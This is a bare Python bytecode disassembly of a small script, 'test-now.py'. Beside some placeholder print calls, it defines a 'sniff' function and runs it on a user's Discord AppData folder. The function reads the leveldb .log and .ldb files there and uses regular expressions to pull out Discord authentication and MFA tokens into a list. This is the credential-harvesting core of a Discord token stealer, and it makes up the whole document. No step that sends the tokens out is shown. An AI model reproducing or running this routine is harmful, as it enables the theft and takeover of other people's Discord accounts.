 32           0 LOAD_BUILD_CLASS
              2 LOAD_CONST               0 (<code object a at 0x00000235D50B3660, file "test-now.py", line 32>)
              4 LOAD_CONST               1 ('a')
              6 MAKE_FUNCTION            0
              8 LOAD_CONST               1 ('a')
             10 CALL_FUNCTION            2
             12 STORE_NAME               0 (a)

 37          14 LOAD_CONST               2 (0)
             16 LOAD_CONST               3 (None)
             18 IMPORT_NAME              1 (os)
             20 STORE_NAME               1 (os)
             22 LOAD_CONST               2 (0)
             24 LOAD_CONST               3 (None)
             26 IMPORT_NAME              2 (re)
             28 STORE_NAME               2 (re)

 38          30 LOAD_CONST               4 (<code object sniff at 0x00000235D50B3930, file "test-now.py", line 38>)
             32 LOAD_CONST               5 ('sniff')
             34 MAKE_FUNCTION            0
             36 STORE_NAME               3 (sniff)

 52          38 LOAD_NAME                3 (sniff)
             40 LOAD_CONST               6 ('C:\\Users\\User\\AppData\\Roaming\\Discord')
             42 CALL_FUNCTION            1
             44 POP_TOP

 53          46 LOAD_NAME                4 (print)
             48 LOAD_CONST               7 ('we ends')
             50 CALL_FUNCTION            1
             52 POP_TOP
             54 LOAD_CONST               3 (None)
             56 RETURN_VALUE

Disassembly of <code object a at 0x00000235D50B3660, file "test-now.py", line 32>:
 32           0 LOAD_NAME                0 (__name__)
              2 STORE_NAME               1 (__module__)
              4 LOAD_CONST               0 ('a')
              6 STORE_NAME               2 (__qualname__)

 33           8 LOAD_CONST               1 (<code object __init__ at 0x00000235D50ABED0, file "test-now.py", line 33>)
             10 LOAD_CONST               2 ('a.__init__')
             12 MAKE_FUNCTION            0
             14 STORE_NAME               3 (__init__)

 35          16 LOAD_CONST               3 (<code object test_func at 0x00000235D50AF390, file "test-now.py", line 35>)
             18 LOAD_CONST               4 ('a.test_func')
             20 MAKE_FUNCTION            0
             22 STORE_NAME               4 (test_func)
             24 LOAD_CONST               5 (None)
             26 RETURN_VALUE

Disassembly of <code object __init__ at 0x00000235D50ABED0, file "test-now.py", line 33>:
 34           0 LOAD_GLOBAL              0 (print)
              2 LOAD_CONST               1 ('a')
              4 CALL_FUNCTION            1
              6 POP_TOP
              8 LOAD_CONST               0 (None)
             10 RETURN_VALUE

Disassembly of <code object test_func at 0x00000235D50AF390, file "test-now.py", line 35>:
 36           0 LOAD_GLOBAL              0 (print)
              2 LOAD_CONST               1 ('mmmmmm')
              4 CALL_FUNCTION            1
              6 POP_TOP
              8 LOAD_CONST               0 (None)
             10 RETURN_VALUE

Disassembly of <code object sniff at 0x00000235D50B3930, file "test-now.py", line 38>:
 39           0 LOAD_FAST                0 (path)
              2 LOAD_CONST               1 ('\\Local Storage\\leveldb')
              4 INPLACE_ADD
              6 STORE_FAST               0 (path)

 41           8 BUILD_LIST               0
             10 STORE_FAST               1 (tokens)

 43          12 SETUP_LOOP             132 (to 146)
             14 LOAD_GLOBAL              0 (os)
             16 LOAD_METHOD              1 (listdir)
             18 LOAD_FAST                0 (path)
             20 CALL_METHOD              1
             22 GET_ITER
        >>   24 FOR_ITER               118 (to 144)
             26 STORE_FAST               2 (file_name)

 44          28 LOAD_FAST                2 (file_name)
             30 LOAD_METHOD              2 (endswith)
             32 LOAD_CONST               2 ('.log')
             34 CALL_METHOD              1
             36 POP_JUMP_IF_TRUE        50
             38 LOAD_FAST                2 (file_name)
             40 LOAD_METHOD              2 (endswith)
             42 LOAD_CONST               3 ('.ldb')
             44 CALL_METHOD              1
             46 POP_JUMP_IF_TRUE        50

 45          48 JUMP_ABSOLUTE           24

 47     >>   50 SETUP_LOOP              90 (to 142)
             52 LOAD_CONST               4 (<code object <listcomp> at 0x00000235D50B3810, file "test-now.py", line 47>)
             54 LOAD_CONST               5 ('sniff.<locals>.<listcomp>')
             56 MAKE_FUNCTION            0
             58 LOAD_GLOBAL              3 (open)
             60 LOAD_FAST                0 (path)
             62 FORMAT_VALUE             0
             64 LOAD_CONST               6 ('\\')
             66 LOAD_FAST                2 (file_name)
             68 FORMAT_VALUE             0
             70 BUILD_STRING             3
             72 LOAD_CONST               7 ('ignore')
             74 LOAD_CONST               8 (('errors',))
             76 CALL_FUNCTION_KW         2
             78 LOAD_METHOD              4 (readlines)
             80 CALL_METHOD              0
             82 GET_ITER
             84 CALL_FUNCTION            1
             86 GET_ITER
        >>   88 FOR_ITER                50 (to 140)
             90 STORE_FAST               3 (line)

 48          92 SETUP_LOOP              44 (to 138)
             94 LOAD_CONST               9 (('[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}', 'mfa\\.[\\w-]{84}'))
             96 GET_ITER
        >>   98 FOR_ITER                36 (to 136)
            100 STORE_FAST               4 (regex)

 49         102 SETUP_LOOP              30 (to 134)
            104 LOAD_GLOBAL              5 (re)
            106 LOAD_METHOD              6 (findall)
            108 LOAD_FAST                4 (regex)
            110 LOAD_FAST                3 (line)
            112 CALL_METHOD              2
            114 GET_ITER
        >>  116 FOR_ITER                14 (to 132)
            118 STORE_FAST               5 (token)

 50         120 LOAD_FAST                1 (tokens)
            122 LOAD_METHOD              7 (append)
            124 LOAD_FAST                5 (token)
            126 CALL_METHOD              1
            128 POP_TOP
            130 JUMP_ABSOLUTE          116
        >>  132 POP_BLOCK
        >>  134 JUMP_ABSOLUTE           98
        >>  136 POP_BLOCK
        >>  138 JUMP_ABSOLUTE           88
        >>  140 POP_BLOCK
        >>  142 JUMP_ABSOLUTE           24
        >>  144 POP_BLOCK

 51     >>  146 LOAD_FAST                1 (tokens)
            148 RETURN_VALUE

Disassembly of <code object <listcomp> at 0x00000235D50B3810, file "test-now.py", line 47>:
 47           0 BUILD_LIST               0
              2 LOAD_FAST                0 (.0)
        >>    4 FOR_ITER                20 (to 26)
              6 STORE_FAST               1 (x)
              8 LOAD_FAST                1 (x)
             10 LOAD_METHOD              0 (strip)
             12 CALL_METHOD              0
             14 POP_JUMP_IF_FALSE        4
             16 LOAD_FAST                1 (x)
             18 LOAD_METHOD              0 (strip)
             20 CALL_METHOD              0
             22 LIST_APPEND              2
             24 JUMP_ABSOLUTE            4
        >>   26 RETURN_VALUE
